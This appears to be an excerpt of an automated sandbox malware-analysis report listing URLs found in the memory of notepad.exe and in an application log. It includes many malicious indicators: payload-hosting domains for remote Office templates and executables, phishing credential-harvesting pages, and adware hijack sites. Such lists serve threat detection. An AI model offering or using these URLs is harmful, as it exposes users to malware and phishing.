          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://htmlpreview.github.io
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http://b0ffffff?ffffff???333333?333333?.drid
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://i.firstinstallmac.club/static/mplayer/mplayer.zip
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://ipv4.fiddler:
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://isearch.omiga-plus.com/?type=sc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://istart.webssearches.com/?type=sc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://jmcglone.com
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://karab.hopto.org/kilo.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kitten-268.frge.io/article.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kopot.myftp.biz/menu/kilos/oyjkff.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lump.semara.ru/dch00-01/counter/nearest/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lump.semara.ru/dch00-01/counter/nearest/needle.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://majesticraft.com/ema/panel/purchaseorder.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://media.vitkvitk.com/xmlstatic/ads/videoplaza/vittalia.html?df=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://melitaeas.online/985bdc0f/princess/go/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://metasploit.comvarshellcode1=unescape
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mishkat-arom.com/boutique/skin/frontend/rwd/default/js/lib/elevatezoom/2021/files/reportmaers
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nay78.glow.nakushita.ru/pr_kyy/endless.abr
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://newglobalinternationalsewdifwefkseifodwe.duckdns.org/vbc/document.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://officewindowssecurityfirewallopen.duckdns.org/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://outfish.bounceme.net/outl.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://pilasto.host/po.exe
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ppaauuaa11232.cc/dlx5rc.dotm
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pretence77.glorious.nonima.ru/elenapc/principles/nearly.mp3
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://private0091111.duckdns.org/qagj/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://private0091111.duckdns.org/qagj/gipsy.png
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://ramashardware.co.za/wp-fxm.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rgtconsultoriaimobiliaria.eating-organic.net
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://securecon.top/kb8xp/1806xp
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://securecon.top/kb8xp/248p
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shgshgwsdynationalobjindustrialat18ygs.duckdns.org/receipt/invoice_202121.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://simpant.sc.ug/ccc/expl.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://snapper.genesysindonesia.com/excel/excelz/index.php?email=
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://sound23.sundabokun.ru/frimepc2016-pc/allowance.stc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://srsp.app/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stdykungcommunicationtarisupliermg51gma.duckdns.org/receipt/invoice_651252.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://swipermachinereview.xyz/wp-includes/t3ow4kf0p0q8oo/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://theenterpriseholdings.com/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thrprivatecloudshareandfileprotectagent.duckdns.org/receipt/invoice_651254.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://tomond.ru/vz/release/refreshment/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tomond.ru/vz/release/refreshment/regular.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://towardsdatascience.com
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://transfer.sh/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://usa-national.info/gpu/self/relic.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://usb.mine.nu/c.sh-o/users/shared/c.sh
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vesicafirearms.com/default_page_static_resources/are3qx2hrev8cstwss/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://vsit.site/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://windowsdefendergateway.duckdns.org/documents.doc
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://word2022.c1.biz/template.dotm
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://wordgroup.bounceme.net/9cb6541e5b0d/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www-searches.com/?s=f1tzdefytd1
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.22find.com/?utm_source=b&utm_medium=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.5z8.info/cockfights_e9g5fw_aryanbr0ther00d
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bitly.com/yeuiqwbdhasdvbhsagdhj%public%
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bonusesfound.ml/update/index.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comeinbaby.com/updateerror/fiif
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.delta-homes.com/?utm_source=b&utm_medium=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
          Source: notepad.exe, 00000000.00000002.606666431.000001CF7AA7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.mygreatlearning.com
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.poltc.cz/zackova/novak.exe-outfilec:
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.sakurasora.com/zsp_pdf.php%22%20method%3d%22post
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.shorturl.co.in/b8k74irtb
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.sweet-page.com/?type=sc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: http://www.systweak.com/registrycleaner
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.theabigailbloomcakecompany.co.uk/wp-content/uploads/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/t3chyy
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yourcontents.xyz/0758/0806pn
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yuanbinglun.com/www.yuanbinglun.com/7kkwqmxrwqk0oli/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://a.pomf.cat/litjjy.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://a.pomf.cat/lphott.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://ab.v-mail.online/?e=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acaciavictorias.com/sxmal.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://accounts.google.com/o/oauth2/auth
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://ads-letter.info/api/install/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://alejandraprestamosv7.ceramicdentalimplants.net.au/sleg.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alttitude-finance.com/wp-content/plugins/js_composer/vendor/mmihey/5qwkwhxc.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquesky.com/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://arcomsanitizacion.cl/asp/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arcomsanitizacion.cl/asp/label.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://armybar.hopto.org/remoteload.dotm
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://awareaudience.com/bay/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bb.realestateprivateportfolio.com/img/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://benabase.com/cgi_bin/amvzdxmuc3vhcmv6qhzvbg90zweuy29t
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://bextlife.xyz/wizthaiguy/excell.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/alexserg112/newtrix/downloads/dfgdfg.dotm
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/atlasover/atlassiancore/downloads/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/meganzscr/repname/downloads/frr.dotm
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/report-fedex.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://bluecornerblog.tk/puzo/doc/purchase.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://bnet.forrentinproutsneckthechip.com/z/script/veri/login.php?email=w.masiga
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brandtrust.com.pk/fonts/login/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://browserimprovements.com/check-opt-out?url=$
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://business.missedvoicevolp.com/?e=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cartoonist.me.uk/wp-content/plugins/jetpack/scss/_utilities/us1svv7bfhaue.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/818650717425369109/820114768295231529/lll.x86
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://ceibosnorte.com/images/clients/01/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://ceibosnorte.com/images/clients/01/lub.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chargethe.cloud/audio/index.php#safa&#46;navas
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://childrenplacebd.com/functions/h
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chinatafseer.com/linners/vipe_11/send.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clever-links.com/kwihl
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clever-links.com/rgeaa
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cnaaa11sd.gb.net/efcdsvftgxc/?gdes3sc=6sdfr45
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://connectoutlook.email/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://connectoutlook.email/main.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://creators.care/zxhwcmvzc3jlcxvlc3razxhwzmyuy29t
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://digitalsurana.com/wp-content/kch/new-po.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://dn.se/bot_tjansteskrivelse.docx
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://docria.github.io
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://dohabritishschool.tk/pdf/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dohabritishschool.tk/pdf/ahmad.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doocument.m2diving.ml/fay/login.php?log
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://e-secure-log.ga/abu/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://e-secure-log.ga/abu/next.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://emicrosoftteam.com/scot/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://emicrosoftteam.com/scot/nxt.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://emulatoros.github.io
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://endodermic-needles.000webhostapp.com/clean.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://exaltmathiasministries.org/wp-content/plugins/litespeed-cache/src/cdn/zdac74pa.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://extraosseous.com/zik/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://extraosseous.com/zik/document.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.attend-doha-expo.com/inv.html
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/converter.dot
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://formbucket.com/f/buk_
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpvtunes.binaryprotectors.com/msreal/jreside
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://gengengma.com/wp-content/uploads/vipe_11/send.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://gez.org.zw/errorpages/load/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goodiebagkanvas.com/m/?login=ithelp
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://gorruck.com/random/8x8para.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://greatblueinds.com/ajx-admin/ckeditor/plugins/wsc/dialogs/3o9vbeip3k.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://hide.link/lfspz
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/ajo/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/egab/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/emzf/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/lin/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/tism/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosteriaestilonorte.com.ar/admins/uzie/actions.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://inst.shconstmarket.com/veafdsag.msi?devop=ertnsgsfa
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://itop.so/cmuqy
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://itop.so/ucrek
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jeffmhall.net/lant/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jeffmhall.net/lant/next.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://jjgamemachine.com/cig.bin/realm/send.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jmcglone.com
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://josematechky.com/docs/ec21_order.doc
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://juniorleadersacademy.com/reporthotmail.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://jupiter.co.tz/signature/trip/feed.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://k9b.site/20940293842309/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kaiedge.com/xp/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kes.kg/administrator/modules/mod_login/tmpl/1/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://lidamtour.com/masivo/ala/brinmst/
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://lidamtour.com/masivo/ala/cronsrt/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lidamtour.com/masivo/ala/cronsrt/corn.dot
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lidamtour.com/masivo/file/kmshost/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://livelongerfeelbetter.com/
